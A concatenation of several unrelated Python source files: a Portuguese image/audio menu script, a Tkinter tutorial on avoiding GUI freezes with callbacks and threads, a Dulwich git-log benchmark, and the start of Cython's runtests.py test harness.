menuOperacoesAritmeticas = {
1: 'Multiplicação de imagens',
2: 'Subtração de imagens',
3: 'Sair',
}
menuOperacoesLogicas = {
1: 'Negativo',
2: 'AND',
3: 'Sair',
}
menuFiltragem = {
1: 'Threshold',
2: 'Preto e Branco',
3: 'Sair',
}
menuAudioEdicao= {
1: 'Cortar áudio',
2: 'Juntar áudio',
3: 'Sair',
}
menuAudioFiltros = {
1: 'Low Pass Filter (Demora cerca de 15sec a ser aplicado)',
2: 'Acelerar áudio',
3: 'Sair',
}
def print_menuPrincipal():
print('-> Menu Principal\n ')
for key in menuPrincipalOptions.keys():
print (key, '->', menuPrincipalOptions[key] )
def print_menuImagens():
print('-> Menu Imagens\n ')
for key in menuImagensOptions.keys():
print (key, '->', menuImagensOptions[key] )
def print_menuAudio():
print('-> Menu Áudio\n ')
for key in menuAudioOptions.keys():
print (key, '->', menuAudioOptions[key] )
def print_menuCompressao():
print('-> Menu Compressão\n ')
for key in menuCompressaoOptions.keys():
print (key, '->', menuCompressaoOptions[key] )
def print_menuOperacoesAritmeticas():
print('-> Menu Operações Aritméticas\n ')
for key in menuOperacoesAritmeticas.keys():
print (key, '->', menuOperacoesAritmeticas[key] )
def print_menuOperacoesLogicas():
print('-> Menu Operações Lógicas\n ')
for key in menuOperacoesLogicas.keys():
print (key, '->', menuOperacoesLogicas[key] )
def print_menuFiltragem():
print('-> Menu Filtragem\n ')
for key in menuFiltragem.keys():
print (key, '->', menuFiltragem[key] )
def print_menuAudioEdicao():
print('-> Menu Edição de Áudio\n ')
for key in menuAudioEdicao.keys():
print (key, '->', menuAudioEdicao[key] )
def print_menuAudioFiltros():
print('-> Menu Filtros de Áudio\n ')
for key in menuAudioFiltros.keys():
print (key, '->', menuAudioFiltros[key] )
def clearConsole():
command = 'clear'
if os.name in ('nt', 'dos'): # If Machine is running on Windows, use cls
command = 'cls'
os.system(command)
|
preventfreeze.py | """
Reference:
Why your GUI app freezes
http://stupidpythonideas.blogspot.com/2013/10/why-your-gui-app-freezes.html
"""
import tkinter as tk
import time
"""
Imagine a simple Tkapp.
(Everything is pretty much the same for most other GUI frameworks, and many frameworks for games and network servers,
and even things like SAX parsers, but most novices first run into this with GUI apps,
and Tkinter is easy to explore because it comes with Python.)
"""
"""
def handle_click():
print("Clicked")
root = tk.Tk()
tk.Button(root, text="Click me", command=handle_click).pack()
root.mainloop()
"""
"""
Now Imagine that, instead of just printing a message, you want it to pop
up a window, wait 5 seconds, then close the window. You might try to write this:
root = tk.Tk()
def handle_click():
win = tk.Toplevel(root)
win.transient()
tk.Label(win, text="Please wait...").pack()
for i in range(5, 0, -1):
print(i)
time.sleep(1)
win.destroy()
tk.Button(root, text="Click me", command=handle_click).pack()
root.mainloop()
But when you click the button, the window does not show up.
And the mainwindows freezes up and beachballs for 5 seconds
This is because you event handler has not returned, so the main loop cannot process any event.
It needs to process event to display a new window,
respond to messages from the OS, etc., and you are not letting is.
"""
"""
There are two basic ways around this problem: callbacks, or threads.
There are advantages and disadvantages of both. And then there are various
ways of building thread-like functionality on top of callbacks, which let you
get (part of) the best of both worlds, but I will get to those in another post
(http://stupidpythonideas.blogspot.com/2013/10/solving-callbacks-for-python-guis.html)
"""
"""
Your event handler has to return in a fraction of a second.
But what if you still have code to run? You have to
reorganize your code: Do some setup,
then schedule the rest of the code to run later.
And that "rest of the code" is also an event handler,
so it also has to return in a fraction of a second,
which means often it will have to do a bit of work and again
schedule the rest to run later.
Depending on what you're trying to do, you may want to run on a timer,
or whenever the event loop is idle,
or every time through the event loop no matter what.
In this case, we want to run once/second.
In Tkinter, you do this with the after method:
root = tk.Tk()
def handle_click():
win = tk.Toplevel(root)
win.transient()
tk.Label(win, text='Please wait...').pack()
i = 5
def callback():
nonlocal i, win
print(i)
i -= 1
if not i:
win.destroy()
else:
root.after(1000, callback)
root.after(1000, callback)
tk.Button(root, text="Click me", command=handle_click).pack()
root.mainloop()
"""
"""
For a different example, imagine we just have some processing that takes a few
seconds because it has so much work to do.
We will do something stupid and simple
def handle_click():
tot = sum(range(100000))
label.config(text=tot)
root = tk.Tk()
tk.Button(root, text='add it up', command=handle_click).pack()
label = tk.Label(root)
label.pack()
root.mainloop()
When you click the button, the whole app will freeze up for a few seconds
as Python calculates that sum. So, what we want to do is break it up into chunks:
def handle_click():
total = 0
i = 0
def callback():
nonlocal i, total
total += sum(range(i * 100000, (i + 1) * 100000))
i += 1
if i == 100:
label.config(text=total)
else:
root.after_idle(callback)
root.after_idle(callback)
root = tk.Tk()
tk.Button(root, text='add it up', command=handle_click).pack()
label = tk.Label(root)
label.pack()
root.mainloop()
While callback definitely work, there are lot of problem with them
First, we have turned out control flow inside-out. Compare the simple for loop
to the chain of callbacks that append it. And it gets much worse when you have more complicated code.
On top of that, it's very easy to get lost in a callback chain. If you forgot to schedule the next callback,
the operation never finishes
"""
"""
Another option is a hybrid approach:
Do your GUI stuff in the main thread,
and your I/O in a second thread.
Both of them can still be callback-driven,
and you can localize all of the threading problems
to the handful of places where the two have to
interact with each other.
"""
"""
Threading:
with with multithreading, we do not have to recognize out code at all, we just move
all of the work onto a thread:
import threading
def handle_click():
def callback():
total = sum(range(100000000))
print(total)
t = threading.Thread(target=callback)
t.start()
root = tk.Tk()
tk.Button(root, text='clickme', command=handle_click).pack()
root.mainloop()
"""
import threading
def handle_click():
def callback():
total = sum(range(100000000))
root.on_main_thread(lambda: label.config(text=total))
t = threading.Thread(target=callback)
t.start()
root = tk.Tk()
tk.Button(root, text='clickme', command=handle_click).pack()
root.mainloop()
|
bm_dulwich_log.py | """
Iterate on commits of the asyncio Git repository using the Dulwich module.
"""
import os
from mpkmemalloc import *
import os
import gc
import threading
import psutil
import pyperf
import dulwich.repo
def iter_all_commits(repo):
# iterate on all changes on the Git repository
for entry in repo.get_walker(head):
pass
# if __name__ == "__main__":
def functionWorker(tname, allocate_pkey):
if allocate_pkey:
pkey_thread_mapper(tname)
runner = pyperf.Runner(loops=1)
runner.metadata['description'] = ("Dulwich benchmark: "
"iterate on all Git commits")
repo_path = os.path.join(os.path.dirname(__file__), 'data', 'asyncio.git')
repo = dulwich.repo.Repo(repo_path)
head = repo.head()
runner.bench_func('dulwich_log', iter_all_commits, repo)
repo.close()
del runner
pymem_reset()
def dummyFunc(name):
pass
def main(params):
pymem_setup_allocators(0)
gc.disable()
workers = len(params) if (len(params)>0) else 1
runner = pyperf.Runner(loops = 1)
runner.argparser.add_argument("--cases")
runner.bench_func("Dummy init", dummyFunc, "main")
del runner
threads = []
for i in range(workers):
tname = 'Worker' + str(i)
threads.append(threading.Thread(target=functionWorker, args=[tname,1], name=tname))
for idx, thread in enumerate(threads):
thread.start()
thread.join()
pymem_reset_pkru()
result = {}
for activation in params:
result[activation] = "Finished thread execution"
process = psutil.Process(os.getpid())
print((process.memory_info().rss)/1024) # in bytes
return(result)
if __name__ == '__main__':
out = main({'activation1':{},'activation3':{},'activation4':{}, 'activation2': {},
'activation31':{},'activation33':{},'activation34':{}, 'activation32': {},
'activation45':{},'activation46':{},'activation47':{}, 'activation48': {}})
process = psutil.Process(os.getpid())
print((process.memory_info().rss)/1024) # in bytes
|
runtests.py | #!/usr/bin/env python
from __future__ import print_function
import atexit
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from collections import defaultdict
except ImportError:
class defaultdict(object):
def __init__(self, default_factory=lambda : None):
self._dict = {}
self.default_factory = default_factory
def __getitem__(self, key):
if key not in self._dict:
self._dict[key] = self.default_factory()
return self._dict[key]
def __setitem__(self, key, value):
self._dict[key] = value
def __contains__(self, key):
return key in self._dict
def __repr__(self):
return repr(self._dict)
def __nonzero__(self):
return bool(self._dict)
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
CY3_DIR = None
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
from distutils import ccompiler
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
# late import to accommodate for setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see http://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:numpy_old': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_old_numpy_extension(ext):
update_numpy_extension(ext, set_api17_macro=False)
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro:
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
update cpp11 extensions that will run on versions of gcc >4.8
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
if float(compiler_version) > 4.8:
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
finds gcc version using Popen
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
if compiler_version and compiler_version.split('.') >= ['4', '2']:
return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:numpy_old' : update_old_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
(2,7) : (operator.lt, lambda x: x in ['run.withstat_py27', # multi context with statement
'run.yield_inside_lambda',
'run.test_dictviews',
'run.pyclass_special_methods',
'run.set_literals',
]),
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2'
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
list_unchanging_dir = memoize(lambda x: os.listdir(x))
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self):
self.output = []
self.write = self.output.append
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items()):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if sys.platform not in ['win32'] and self.add_embedded_test:
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir, self.cleanup_workdir, stats=self.stats))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if skip_c(tags) and 'c' in languages:
languages = list(languages)
languages.remove('c')
elif 'no-cpp' in tags['tag'] and 'cpp' in self.languages:
languages = list(languages)
languages.remove('cpp')
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
from pythran import __version__ as pythran_version
pythran_ext = (
pythran.config.make_extension(python=True)
if pythran_version >= '0.9' or pythran_version >= '0.8.7'
else pythran.config.make_extension()
)
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list ]
return tests
def build_test(self, test_class, path, workdir, module, tags, language,
expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % str(preparse)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
fork=self.fork,
language_level=self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
# MSCV: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s) %s" % (self.language, "/pythran" if self.pythran_dir is not None else "", self.name)
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in ('warning_errors', 'clear_to_none', 'error_on_unknown_names', 'error_on_uninitialized')
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
if not cleanup_c_files:
if (rmfile[-2:] in (".c", ".h") or
rmfile[-4:] == ".cpp" or
rmfile.endswith(".html") and rmfile.startswith(self.module)):
continue
is_shared_obj = rmfile.endswith(".so") or rmfile.endswith(".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
